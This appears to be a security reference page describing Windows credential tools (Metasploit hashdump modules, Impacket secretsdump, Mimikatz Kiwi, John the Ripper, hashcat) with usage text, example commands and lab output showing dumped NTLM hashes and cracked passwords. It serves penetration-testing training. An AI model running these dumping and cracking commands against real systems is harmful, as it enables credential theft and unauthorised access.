Security Slice

Tag: windows tools

Security tools that can run on Windows

smart_hashdump

⚠ Use on Domain Controllers only. Use the regular hashdump for non-DCs.

Description

This will dump local accounts from the SAM Database. If the target host is a Domain Controller, it will dump the Domain Account Database using the proper technique depending on privilege level, OS and role of the host.

PlatformWindows
AuthorCarlos Perez
LicenseBSD 3-Clause
URLsmart_hashdump.rb

Usage

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  GETSYSTEM  false            no        Attempt to get SYSTEM privilege on the target host.
  SESSION                     yes       The session to run this module on

Examples

run post/windows/gather/smart_hashdump

This is all there is to it.

Blog Posts

secretsdump.py

Description

Performs various techniques to dump hashes from the remote machine without executing any agent there. For SAM and LSA Secrets (including cached creds) we try to read as much as we can from the registry and then we save the hives in the target system (%SYSTEMROOT%\\Temp dir) and read the rest of the data from there.

PlatformPython
AuthorAlberto Solino
LicenseModified Apache License 1.1
URLsecretsdump.py

Usage

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
 
usage: secretsdump.py [-h] [-ts] [-debug] [-system SYSTEM] [-bootkey BOOTKEY]
                      [-security SECURITY] [-sam SAM] [-ntds NTDS]
                      [-resumefile RESUMEFILE] [-outputfile OUTPUTFILE]
                      [-use-vss] [-exec-method [{smbexec,wmiexec,mmcexec}]]
                      [-just-dc-user USERNAME] [-just-dc] [-just-dc-ntlm]
                      [-pwd-last-set] [-user-status] [-history]
                      [-hashes LMHASH:NTHASH] [-no-pass] [-k]
                      [-aesKey hex key] [-keytab KEYTAB] [-dc-ip ip address]
                      [-target-ip ip address]
                      target
 
Performs various techniques to dump secrets from the remote machine without
executing any agent there.
 
positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>
                        or LOCAL (if you want to parse local files)
 
optional arguments:
  -h, --help            show this help message and exit
  -ts                   Adds timestamp to every logging output
  -debug                Turn DEBUG output ON
  -system SYSTEM        SYSTEM hive to parse
  -bootkey BOOTKEY      bootkey for SYSTEM hive
  -security SECURITY    SECURITY hive to parse
  -sam SAM              SAM hive to parse
  -ntds NTDS            NTDS.DIT file to parse
  -resumefile RESUMEFILE
                        resume file name to resume NTDS.DIT session dump (only
                        available to DRSUAPI approach). This file will also be
                        used to keep updating the session's state
  -outputfile OUTPUTFILE
                        base output filename. Extensions will be added for
                        sam, secrets, cached and ntds
  -use-vss              Use the VSS method insead of default DRSUAPI
  -exec-method [{smbexec,wmiexec,mmcexec}]
                        Remote exec method to use at target (only when using
                        -use-vss). Default: smbexec
 
display options:
  -just-dc-user USERNAME
                        Extract only NTDS.DIT data for the user specified.
                        Only available for DRSUAPI approach. Implies also
                        -just-dc switch
  -just-dc              Extract only NTDS.DIT data (NTLM hashes and Kerberos
                        keys)
  -just-dc-ntlm         Extract only NTDS.DIT data (NTLM hashes only)
  -pwd-last-set         Shows pwdLastSet attribute for each NTDS.DIT account.
                        Doesn't apply to -outputfile data
  -user-status          Display whether or not the user is disabled
  -history              Dump password history, and LSA secrets OldVal
 
authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from
                        ccache file (KRB5CCNAME) based on target parameters.
                        If valid credentials cannot be found, it will use the
                        ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256
                        bits)
  -keytab KEYTAB        Read keys for SPN from keytab file
 
connection:
  -dc-ip ip address     IP Address of the domain controller. If ommited it use
                        the domain part (FQDN) specified in the target
                        parameter
  -target-ip ip address
                        IP Address of the target machine. If omitted it will
                        use whatever was specified as target. This is useful
                        when target is the NetBIOS name and you cannot resolve
                        it

Examples

secretsdump.py -ntds ./ntds.dit -system ./system -outputfile /tmp/hashes.txt LOCAL

This will dump the hashes from a saved copy of ntds.dit using the encryption key in a saved copy of the SYSTEM hive.

Blog Posts

Mimikatz Kiwi

Description

Mimikatz is a well known tool to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets. Kiwi is the Metasploit implementation.

PlatformWindows
Authorgentilkiwi (Benjamin DELPY)
LicenseCreative Commons 4.0
URLhttps://blog.gentilkiwi.com/mimikatz

Usage

Kiwi Commands
=============
 
    Command                Description
    -------                -----------
    creds_all              Retrieve all credentials (parsed)
    creds_kerberos         Retrieve Kerberos creds (parsed)
    creds_livessp          Retrieve Live SSP creds
    creds_msv              Retrieve LM/NTLM creds (parsed)
    creds_ssp              Retrieve SSP creds
    creds_tspkg            Retrieve TsPkg creds (parsed)
    creds_wdigest          Retrieve WDigest creds (parsed)
    dcsync                 Retrieve user account information via DCSync (unparsed)
    dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
    golden_ticket_create   Create a golden kerberos ticket
    kerberos_ticket_list   List all kerberos tickets (unparsed)
    kerberos_ticket_purge  Purge any in-use kerberos tickets
    kerberos_ticket_use    Use a kerberos ticket
    kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
    lsa_dump_sam           Dump LSA SAM (unparsed)
    lsa_dump_secrets       Dump LSA secrets (unparsed)
    password_change        Change the password/hash of a user
    wifi_list              List wifi profiles/creds for the current user
    wifi_list_shared       List shared wifi profiles/creds (requires SYSTEM)

Examples

load kiwi

This command will load the Mimikatz module in a Meterpreter session.

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
 
Success.
creds_all

This will attempt to dump all the Windows credentials from RAM.

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
 
Username  Domain         NTLM                              SHA1
--------  ------         ----                              ----
sec       SECSTUDENT     396f460962c665bc648db299d55f1ba2  4029ce95b7a89f3c63148d94e789c0350e069ef4
 
wdigest credentials
===================
 
Username        Domain         Password
--------        ------         --------
(null)          (null)         (null)
SECSTUDENT$     SEC            (null)
sec             SECSTUDENT     (null)
 
kerberos credentials
====================
 
Username        Domain         Password
--------        ------         --------
(null)          (null)         (null)
sec             SEC            sec123
secstudent$     SEC            (null)

Blog Posts

hashdump

Description

This module will dump the local user accounts from the SAM database using the registry.

PlatformWindows
AuthorMetasploit
LicenseBSD 3-Clause
URLhashdump.rb

Usage

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on

Examples

run post/windows/gather/hashdump

Here are the results of running this command from a meterpreter session.

meterpreter > run post/windows/gather/hashdump
 
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 2609c40b5e36c810763cbc8bf8962276...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
 
No users with password hints on this system
 
[*] Dumping password hashes...
 
 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e0d68f3bf01ad13902472922c3921dad:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
SROCAdmin:1008:aad3b435b51404eeaad3b435b51404ee:2e920723943f81ec0af0fd735f737fef:::
antivirus:1009:aad3b435b51404eeaad3b435b51404ee:47f0ca5913c6e70090d7b686afb9e13e:::
slopez:1010:aad3b435b51404eeaad3b435b51404ee:87e968ead530264915a4b295c57c37d5:::
aparker:1011:aad3b435b51404eeaad3b435b51404ee:9b5684b030226a1203e4e7b718a3f9df:::
rgray:1012:aad3b435b51404eeaad3b435b51404ee:23d26a03aa7102abce4805d88e568a78:::
wrobinson:1013:aad3b435b51404eeaad3b435b51404ee:5deaec4b57b859c25cdd0513fb7bc750:::
mlara:1014:aad3b435b51404eeaad3b435b51404ee:d8d9eee954da5f2d42fe72f862fa493f:::
lstout:1015:aad3b435b51404eeaad3b435b51404ee:ca3f0e9ce3188b0602742da2976d6773:::
tandersen:1016:aad3b435b51404eeaad3b435b51404ee:bf459116e5854e34031997be8e13596d:::
awalker:1017:aad3b435b51404eeaad3b435b51404ee:fe1f27a2561b61511588b0d24e333a7c:::
mmiller:1018:aad3b435b51404eeaad3b435b51404ee:7a1f1fd59eb2b97041c74748ea6a68f8:::
vcollins:1019:aad3b435b51404eeaad3b435b51404ee:5bd9b7b6fce76d3aabfebee9debaa932:::
jrivera:1020:aad3b435b51404eeaad3b435b51404ee:baa90a3ad89d359009ce5425063dff3e:::
hhopkins:1021:aad3b435b51404eeaad3b435b51404ee:92929561b2758f409df2b4a24a59c6f4:::
kcooper:1022:aad3b435b51404eeaad3b435b51404ee:5ae44bf0a1e24c0b1ec96708f30e7b84:::
ksutton:1023:aad3b435b51404eeaad3b435b51404ee:a6051a02b7a2bfb4cd0e2c1a9cb4a694:::
rduarte:1024:aad3b435b51404eeaad3b435b51404ee:7ce56170c73f9582fa348db88de2c192:::
dwilliams:1025:aad3b435b51404eeaad3b435b51404ee:c6fd7d8bb36d8862c1b978896a6bec51:::
nramos:1026:aad3b435b51404eeaad3b435b51404ee:0f46bafd2c4acdac0003a1ff4da92625:::
abates:1027:aad3b435b51404eeaad3b435b51404ee:62a56ba1b94193d7f553b895bca28292:::
khansen:1028:aad3b435b51404eeaad3b435b51404ee:fc9fdcdbf09c5be4928287e4ad847dd7:::
vberry:1029:97abc432e5e8e8a03b9ce0ab2b8f2634:d99438ebb5f67b113dab1f907e26979b:::
cgentry:1030:aad3b435b51404eeaad3b435b51404ee:059db5a4061f5a2cb5053e753f9664b4:::
sbates:1031:aad3b435b51404eeaad3b435b51404ee:4f8bfa5d78d7a6398915c9657cd49769:::
dbryant:1032:aad3b435b51404eeaad3b435b51404ee:858bf9272facf23b3593f609e5b64c06:::
srichardson:1033:aad3b435b51404eeaad3b435b51404ee:819dc07ca50e1729d72214e8e9ee8f3a:::
kkennedy:1034:aad3b435b51404eeaad3b435b51404ee:7c3acf216ef4ec061b9330e0ad103c35:::
scook:1035:aad3b435b51404eeaad3b435b51404ee:2d474458480f9aa524ba3ebb1f3f9e6e:::
pmartin:1036:aad3b435b51404eeaad3b435b51404ee:98f9db311936bea281e9a65f45dd1f62:::
egeorge:1037:aad3b435b51404eeaad3b435b51404ee:f482c3342543f49df31a5a240a0558cf:::
phorne:1038:aad3b435b51404eeaad3b435b51404ee:b9a04517b70e549f8b2e4153ee8f4107:::
ckhan:1039:aad3b435b51404eeaad3b435b51404ee:aff059fe35c553548f56db9c85b2d90c:::
dmckenzie:1040:aad3b435b51404eeaad3b435b51404ee:50a173c77e22c87c419cacb5e0629b52:::

Blog Posts

John the Ripper

Description

John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems.

PlatformAll
AuthorOpenwall
LicenseGPLv3
URLhttps://www.openwall.com/john/

Usage

John the Ripper 1.9.0-jumbo-1 OMP [linux-gnu 64-bit x86_64 AVX2 AC]
Copyright (c) 1996-2019 by Solar Designer and others
Homepage: http://www.openwall.com/john/
 
Usage: john [OPTIONS] [PASSWORD-FILES]
--single[=SECTION[,..]]    "single crack" mode, using default or named rules
--single=:rule[,..]        same, using "immediate" rule(s)
--wordlist[=FILE] --stdin  wordlist mode, read words from FILE or stdin
                  --pipe   like --stdin, but bulk reads, and allows rules
--loopback[=FILE]          like --wordlist, but extract words from a .pot file
--dupe-suppression         suppress all dupes in wordlist (and force preload)
--prince[=FILE]            PRINCE mode, read words from FILE
--encoding=NAME            input encoding (eg. UTF-8, ISO-8859-1). See also
                           doc/ENCODINGS and --list=hidden-options.
--rules[=SECTION[,..]]     enable word mangling rules (for wordlist or PRINCE
                           modes), using default or named rules
--rules=:rule[;..]]        same, using "immediate" rule(s)
--rules-stack=SECTION[,..] stacked rules, applied after regular rules or to
                           modes that otherwise don't support rules
--rules-stack=:rule[;..]   same, using "immediate" rule(s)
--incremental[=MODE]       "incremental" mode [using section MODE]
--mask[=MASK]              mask mode using MASK (or default from john.conf)
--markov[=OPTIONS]         "Markov" mode (see doc/MARKOV)
--external=MODE            external mode or word filter
--subsets[=CHARSET]        "subsets" mode (see doc/SUBSETS)
--stdout[=LENGTH]          just output candidate passwords [cut at LENGTH]
--restore[=NAME]           restore an interrupted session [called NAME]
--session=NAME             give a new session the NAME
--status[=NAME]            print status of a session [called NAME]
--make-charset=FILE        make a charset file. It will be overwritten
--show[=left]              show cracked passwords [if =left, then uncracked]
--test[=TIME]              run tests and benchmarks for TIME seconds each
--users=[-]LOGIN|UID[,..]  [do not] load this (these) user(s) only
--groups=[-]GID[,..]       load users [not] of this (these) group(s) only
--shells=[-]SHELL[,..]     load users with[out] this (these) shell(s) only
--salts=[-]COUNT[:MAX]     load salts with[out] COUNT [to MAX] hashes
--costs=[-]C[:M][,...]     load salts with[out] cost value Cn [to Mn]. For
                           tunable cost parameters, see doc/OPTIONS
--save-memory=LEVEL        enable memory saving, at LEVEL 1..3
--node=MIN[-MAX]/TOTAL     this node's number range out of TOTAL count
--fork=N                   fork N processes
--pot=NAME                 pot file to use
--list=WHAT                list capabilities, see --list=help or doc/OPTIONS
--devices=N[,..]           set OpenCL device(s) (see --list=opencl-devices)
--format=NAME              force hash of type NAME. The supported formats can
                           be seen with --list=formats and --list=subformats

Examples

john ~/labs/web01.hashes

This will run john in default mode and try to crack the hashes in the provided file.

msf6 exploit(windows/smb/psexec) > john labs/web01.hashes
Warning: detected hash type "LM", but the string is also recognized as "NT"
Use the "--format=NT" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "LM-opencl"
Use the "--format=LM-opencl" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "NT-opencl"
Use the "--format=NT-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Using default target encoding: CP850
Loaded 38 password hashes with no different salts (LM [DES 256/256 AVX2])
Warning: poor OpenMP scalability for this hash type, consider --fork=2
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 78 candidates buffered for the current salt, minimum 512 needed for performance.
Proceeding with wordlist:/usr/local/share/john/password.lst, rules:Wordlist
                 (dmckenzie)
                 (ckhan)
                 (phorne)
                 (egeorge)
                 (pmartin)
                 (scook)
                 (kkennedy)
                 (srichardson)
                 (dbryant)
                 (sbates)
                 (cgentry)
                 (khansen)
                 (abates)
                 (nramos)
                 (dwilliams)
                 (rduarte)
                 (ksutton)
                 (kcooper)
                 (hhopkins)
                 (jrivera)
                 (vcollins)
                 (mmiller)
                 (awalker)
                 (tandersen)
                 (lstout)
                 (mlara)
                 (wrobinson)
                 (rgray)
                 (aparker)
                 (slopez)
                 (antivirus)
                 (SROCAdmin)
                 (WDAGUtilityAccount)
                 (DefaultAccount)
                 (Guest)
                 (Administrator)
Proceeding with incremental:LM_ASCII
MIMIGOT          (vberry:1)
KNENZ2G          (vberry:2)
38g 0:00:00:02 DONE 3/3 (2022-03-17 01:29) 15.01g/s 40495Kp/s 40495Kc/s 48036KC/s KNEIRS8..KNENZ2G
Warning: passwords printed above might be partial
Use the "--show --format=LM" options to display all of the cracked passwords reliably
Session completed
 john ~/labs/web01.hashes –show

This command will show which passwords have already been cracked in the given file.

sec560@slingshot:~$ sudo john labs/web01.hashes --show
Administrator::500:aad3b435b51404eeaad3b435b51404ee:1ef98de8555541f1579f98084f32875b:::
Guest::501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount::503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount::504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
SROCAdmin::1008:aad3b435b51404eeaad3b435b51404ee:2e920723943f81ec0af0fd735f737fef:::
antivirus::1009:aad3b435b51404eeaad3b435b51404ee:47f0ca5913c6e70090d7b686afb9e13e:::
slopez::1010:aad3b435b51404eeaad3b435b51404ee:87e968ead530264915a4b295c57c37d5:::
aparker::1011:aad3b435b51404eeaad3b435b51404ee:9b5684b030226a1203e4e7b718a3f9df:::
rgray::1012:aad3b435b51404eeaad3b435b51404ee:23d26a03aa7102abce4805d88e568a78:::
wrobinson::1013:aad3b435b51404eeaad3b435b51404ee:5deaec4b57b859c25cdd0513fb7bc750:::
mlara::1014:aad3b435b51404eeaad3b435b51404ee:d8d9eee954da5f2d42fe72f862fa493f:::
lstout::1015:aad3b435b51404eeaad3b435b51404ee:ca3f0e9ce3188b0602742da2976d6773:::
tandersen::1016:aad3b435b51404eeaad3b435b51404ee:bf459116e5854e34031997be8e13596d:::
awalker::1017:aad3b435b51404eeaad3b435b51404ee:fe1f27a2561b61511588b0d24e333a7c:::
mmiller::1018:aad3b435b51404eeaad3b435b51404ee:7a1f1fd59eb2b97041c74748ea6a68f8:::
vcollins::1019:aad3b435b51404eeaad3b435b51404ee:5bd9b7b6fce76d3aabfebee9debaa932:::
jrivera::1020:aad3b435b51404eeaad3b435b51404ee:baa90a3ad89d359009ce5425063dff3e:::
hhopkins::1021:aad3b435b51404eeaad3b435b51404ee:92929561b2758f409df2b4a24a59c6f4:::
kcooper::1022:aad3b435b51404eeaad3b435b51404ee:5ae44bf0a1e24c0b1ec96708f30e7b84:::
ksutton::1023:aad3b435b51404eeaad3b435b51404ee:a6051a02b7a2bfb4cd0e2c1a9cb4a694:::
rduarte::1024:aad3b435b51404eeaad3b435b51404ee:7ce56170c73f9582fa348db88de2c192:::
dwilliams::1025:aad3b435b51404eeaad3b435b51404ee:c6fd7d8bb36d8862c1b978896a6bec51:::
nramos::1026:aad3b435b51404eeaad3b435b51404ee:0f46bafd2c4acdac0003a1ff4da92625:::
abates::1027:aad3b435b51404eeaad3b435b51404ee:62a56ba1b94193d7f553b895bca28292:::
khansen::1028:aad3b435b51404eeaad3b435b51404ee:fc9fdcdbf09c5be4928287e4ad847dd7:::
vberry:MIMIGOTKNENZ2G:1029:97abc432e5e8e8a03b9ce0ab2b8f2634:d99438ebb5f67b113dab1f907e26979b:::
cgentry::1030:aad3b435b51404eeaad3b435b51404ee:059db5a4061f5a2cb5053e753f9664b4:::
sbates::1031:aad3b435b51404eeaad3b435b51404ee:4f8bfa5d78d7a6398915c9657cd49769:::
dbryant::1032:aad3b435b51404eeaad3b435b51404ee:858bf9272facf23b3593f609e5b64c06:::
srichardson::1033:aad3b435b51404eeaad3b435b51404ee:819dc07ca50e1729d72214e8e9ee8f3a:::
kkennedy::1034:aad3b435b51404eeaad3b435b51404ee:7c3acf216ef4ec061b9330e0ad103c35:::
scook::1035:aad3b435b51404eeaad3b435b51404ee:2d474458480f9aa524ba3ebb1f3f9e6e:::
pmartin::1036:aad3b435b51404eeaad3b435b51404ee:98f9db311936bea281e9a65f45dd1f62:::
egeorge::1037:aad3b435b51404eeaad3b435b51404ee:f482c3342543f49df31a5a240a0558cf:::
phorne::1038:aad3b435b51404eeaad3b435b51404ee:b9a04517b70e549f8b2e4153ee8f4107:::
ckhan::1039:aad3b435b51404eeaad3b435b51404ee:aff059fe35c553548f56db9c85b2d90c:::
dmckenzie::1040:aad3b435b51404eeaad3b435b51404ee:50a173c77e22c87c419cacb5e0629b52:::
 
38 password hashes cracked, 0 left
john –format=nt –wordlist=/opt/passwords/rockyou.txt ~/labs/web01.hashes

The following is the output when you run john with a wordlist.

sec560@slingshot:~$ sudo john --format=nt --wordlist=/opt/passwords/rockyou.txt ~/labs/web01.hashes
Using default input encoding: UTF-8
Loaded 36 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Remaining 35 password hashes with no different salts
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
Warrior07        (vcollins)
Tibbetts3        (slopez)
Patrique2238     (wrobinson)
Packardbell350   (mlara)
Oozle11          (aparker)
KAMTPS20!!tim    (rgray)
Chirmol01        (awalker)
BHLMSTz2         (mmiller)
Angels100%       (tandersen)
2soWht!a         (lstout)
10g 0:00:00:00 DONE (2022-03-17 01:46) 10.30g/s 14787Kp/s 14787Kc/s 475458KC/s  Ttwwl789..*7¡Vamos!
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed
 zip2john file.zip

This will produce a crackable hash from an encrypted zip file and store it in a file named backup.hashes.

└─$ zip2john ./backup.zip > ./backup.hashes
ver 2.0 efh 5455 efh 7875 backup.zip/index.php PKZIP Encr: TS_chk, cmplen=1201, decmplen=2594, crc=3A41AE06 ts=5722 cs=5722 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/style.css PKZIP Encr: TS_chk, cmplen=986, decmplen=3274, crc=1B1CCD6A ts=989A cs=989a type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
john –format=Raw-MD5 –wordlist=./wordlist8.txt ./passhash.txt

This command will attempt to crack a raw MD5 password hash using the wordlist.

└─$ john --format=Raw-MD5 --wordlist=./wordlist8.txt ./passhash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
qwerty789        (?)    
1g 0:00:00:00 DONE (2022-03-27 14:12) 50.00g/s 1891Kp/s 1891Kc/s 1891KC/s snapdragon..play2win
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

Blog Posts

hashcat

Description

World’s fastest password cracker

PlatformAll
AuthorJens Steube
LicenseMIT
URLhttps://hashcat.net/hashcat/

Usage

hashcat (v6.2.4) starting in help mode
 
Usage: hashcat [options]... hash|hashfile|hccapxfile [dictionary|mask|directory]...
 
- [ Options ] -
 
 Options Short / Long           | Type | Description                                          | Example
================================+======+======================================================+=======================
 -m, --hash-type                | Num  | Hash-type, references below (otherwise autodetect)   | -m 1000
 -a, --attack-mode              | Num  | Attack-mode, see references below                    | -a 3
 -V, --version                  |      | Print version                                        |
 -h, --help                     |      | Print help                                           |
     --quiet                    |      | Suppress output                                      |
     --hex-charset              |      | Assume charset is given in hex                       |
     --hex-salt                 |      | Assume salt is given in hex                          |
     --hex-wordlist             |      | Assume words in wordlist are given in hex            |
     --force                    |      | Ignore warnings                                      |
     --deprecated-check-disable |      | Enable deprecated plugins                            |
     --status                   |      | Enable automatic update of the status screen         |
     --status-json              |      | Enable JSON format for status output                 |
     --status-timer             | Num  | Sets seconds between status screen updates to X      | --status-timer=1
     --stdin-timeout-abort      | Num  | Abort if there is no input from stdin for X seconds  | --stdin-timeout-abort=300
     --machine-readable         |      | Display the status view in a machine-readable format |
     --keep-guessing            |      | Keep guessing the hash after it has been cracked     |
     --self-test-disable        |      | Disable self-test functionality on startup           |
     --loopback                 |      | Add new plains to induct directory                   |
     --markov-hcstat2           | File | Specify hcstat2 file to use                          | --markov-hcstat2=my.hcstat2
     --markov-disable           |      | Disables markov-chains, emulates classic brute-force |
     --markov-classic           |      | Enables classic markov-chains, no per-position       |
 -t, --markov-threshold         | Num  | Threshold X when to stop accepting new markov-chains | -t 50
     --runtime                  | Num  | Abort session after X seconds of runtime             | --runtime=10
     --session                  | Str  | Define specific session name                         | --session=mysession
     --restore                  |      | Restore session from --session                       |
     --restore-disable          |      | Do not write restore file                            |
     --restore-file-path        | File | Specific path to restore file                        | --restore-file-path=x.restore
 -o, --outfile                  | File | Define outfile for recovered hash                    | -o outfile.txt
     --outfile-format           | Str  | Outfile format to use, separated with commas         | --outfile-format=1,3
     --outfile-autohex-disable  |      | Disable the use of $HEX[] in output plains           |
     --outfile-check-timer      | Num  | Sets seconds between outfile checks to X             | --outfile-check=30
     --wordlist-autohex-disable |      | Disable the conversion of $HEX[] from the wordlist   |
 -p, --separator                | Char | Separator char for hashlists and outfile             | -p :
     --stdout                   |      | Do not crack a hash, instead print candidates only   |
     --show                     |      | Compare hashlist with potfile; show cracked hashes   |
     --left                     |      | Compare hashlist with potfile; show uncracked hashes |
     --username                 |      | Enable ignoring of usernames in hashfile             |
     --remove                   |      | Enable removal of hashes once they are cracked       |
     --remove-timer             | Num  | Update input hash file each X seconds                | --remove-timer=30
     --potfile-disable          |      | Do not write potfile                                 |
     --potfile-path             | File | Specific path to potfile                             | --potfile-path=my.pot
     --encoding-from            | Code | Force internal wordlist encoding from X              | --encoding-from=iso-8859-15
     --encoding-to              | Code | Force internal wordlist encoding to X                | --encoding-to=utf-32le
     --debug-mode               | Num  | Defines the debug mode (hybrid only by using rules)  | --debug-mode=4
     --debug-file               | File | Output file for debugging rules                      | --debug-file=good.log
     --induction-dir            | Dir  | Specify the induction directory to use for loopback  | --induction=inducts
     --outfile-check-dir        | Dir  | Specify the outfile directory to monitor for plains  | --outfile-check-dir=x
     --logfile-disable          |      | Disable the logfile                                  |
     --hccapx-message-pair      | Num  | Load only message pairs from hccapx matching X       | --hccapx-message-pair=2
     --nonce-error-corrections  | Num  | The BF size range to replace AP's nonce last bytes   | --nonce-error-corrections=16
     --keyboard-layout-mapping  | File | Keyboard layout mapping table for special hash-modes | --keyb=german.hckmap
     --truecrypt-keyfiles       | File | Keyfiles to use, separated with commas               | --truecrypt-keyf=x.png
     --veracrypt-keyfiles       | File | Keyfiles to use, separated with commas               | --veracrypt-keyf=x.txt
     --veracrypt-pim-start      | Num  | VeraCrypt personal iterations multiplier start       | --veracrypt-pim-start=450
     --veracrypt-pim-stop       | Num  | VeraCrypt personal iterations multiplier stop        | --veracrypt-pim-stop=500
 -b, --benchmark                |      | Run benchmark of selected hash-modes                 |
     --benchmark-all            |      | Run benchmark of all hash-modes (requires -b)        |
     --speed-only               |      | Return expected speed of the attack, then quit       |
     --progress-only            |      | Return ideal progress step size and time to process  |
 -c, --segment-size             | Num  | Sets size in MB to cache from the wordfile to X      | -c 32
     --bitmap-min               | Num  | Sets minimum bits allowed for bitmaps to X           | --bitmap-min=24
     --bitmap-max               | Num  | Sets maximum bits allowed for bitmaps to X           | --bitmap-max=24
     --cpu-affinity             | Str  | Locks to CPU devices, separated with commas          | --cpu-affinity=1,2,3
     --hook-threads             | Num  | Sets number of threads for a hook (per compute unit) | --hook-threads=8
     --hash-info                |      | Show information for each hash-mode                  |
     --example-hashes           |      | Alias of --hash-info                                 |
     --backend-ignore-cuda      |      | Do not try to open CUDA interface on startup         |
     --backend-ignore-opencl    |      | Do not try to open OpenCL interface on startup       |
 -I, --backend-info             |      | Show info about detected backend API devices         | -I
 -d, --backend-devices          | Str  | Backend devices to use, separated with commas        | -d 1
 -D, --opencl-device-types      | Str  | OpenCL device-types to use, separated with commas    | -D 1
 -O, --optimized-kernel-enable  |      | Enable optimized kernels (limits password length)    |
 -M, --multiply-accel-disable   |      | Disable multiply kernel-accel with processor count   |
 -w, --workload-profile         | Num  | Enable a specific workload profile, see pool below   | -w 3
 -n, --kernel-accel             | Num  | Manual workload tuning, set outerloop step size to X | -n 64
 -u, --kernel-loops             | Num  | Manual workload tuning, set innerloop step size to X | -u 256
 -T, --kernel-threads           | Num  | Manual workload tuning, set thread count to X        | -T 64
     --backend-vector-width     | Num  | Manually override backend vector-width to X          | --backend-vector=4
     --spin-damp                | Num  | Use CPU for device synchronization, in percent       | --spin-damp=10
     --hwmon-disable            |      | Disable temperature and fanspeed reads and triggers  |
     --hwmon-temp-abort         | Num  | Abort if temperature reaches X degrees Celsius       | --hwmon-temp-abort=100
     --scrypt-tmto              | Num  | Manually override TMTO value for scrypt to X         | --scrypt-tmto=3
 -s, --skip                     | Num  | Skip X words from the start                          | -s 1000000
 -l, --limit                    | Num  | Limit X words from the start + skipped words         | -l 1000000
     --keyspace                 |      | Show keyspace base:mod values and quit               |
 -j, --rule-left                | Rule | Single rule applied to each word from left wordlist  | -j 'c'
 -k, --rule-right               | Rule | Single rule applied to each word from right wordlist | -k '^-'
 -r, --rules-file               | File | Multiple rules applied to each word from wordlists   | -r rules/best64.rule
 -g, --generate-rules           | Num  | Generate X random rules                              | -g 10000
     --generate-rules-func-min  | Num  | Force min X functions per rule                       |
     --generate-rules-func-max  | Num  | Force max X functions per rule                       |
     --generate-rules-func-sel  | Str  | Pool of rule operators valid for random rule engine  | --generate-rules-func-sel=ioTlc
     --generate-rules-seed      | Num  | Force RNG seed set to X                              |
 -1, --custom-charset1          | CS   | User-defined charset ?1                              | -1 ?l?d?u
 -2, --custom-charset2          | CS   | User-defined charset ?2                              | -2 ?l?d?s
 -3, --custom-charset3          | CS   | User-defined charset ?3                              |
 -4, --custom-charset4          | CS   | User-defined charset ?4                              |
     --identify                 |      | Shows all supported algorithms for input hashes      | --identify my.hash
 -i, --increment                |      | Enable mask increment mode                           |
     --increment-min            | Num  | Start mask incrementing at X                         | --increment-min=4
     --increment-max            | Num  | Stop mask incrementing at X                          | --increment-max=8
 -S, --slow-candidates          |      | Enable slower (but advanced) candidate generators    |
     --brain-server             |      | Enable brain server                                  |
     --brain-server-timer       | Num  | Update the brain server dump each X seconds (min:60) | --brain-server-timer=300
 -z, --brain-client             |      | Enable brain client, activates -S                    |
     --brain-client-features    | Num  | Define brain client features, see below              | --brain-client-features=3
     --brain-host               | Str  | Brain server host (IP or domain)                     | --brain-host=127.0.0.1
     --brain-port               | Port | Brain server port                                    | --brain-port=13743
